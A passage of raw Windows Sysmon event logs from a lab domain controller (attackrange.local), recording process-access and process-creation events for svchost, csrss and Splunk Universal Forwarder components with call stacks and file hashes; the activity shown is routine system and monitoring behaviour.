indows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004761Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004760Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004759Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004758Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004757Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-441F-6000-0B01-000000009A01}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004756Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-441F-6000-0B01-000000009A01}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004755Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:15.103{08A6967A-441F-6000-0B01-000000009A01}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4420-6000-0D01-000000009A01}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4420-6000-0D01-000000009A01}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4420-6000-0D01-000000009A01}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:16.447{08A6967A-4420-6000-0D01-000000009A01}1172C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.885{08A6967A-4421-6000-0E01-000000009A01}41964264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4421-6000-0E01-000000009A01}4196C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:16:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\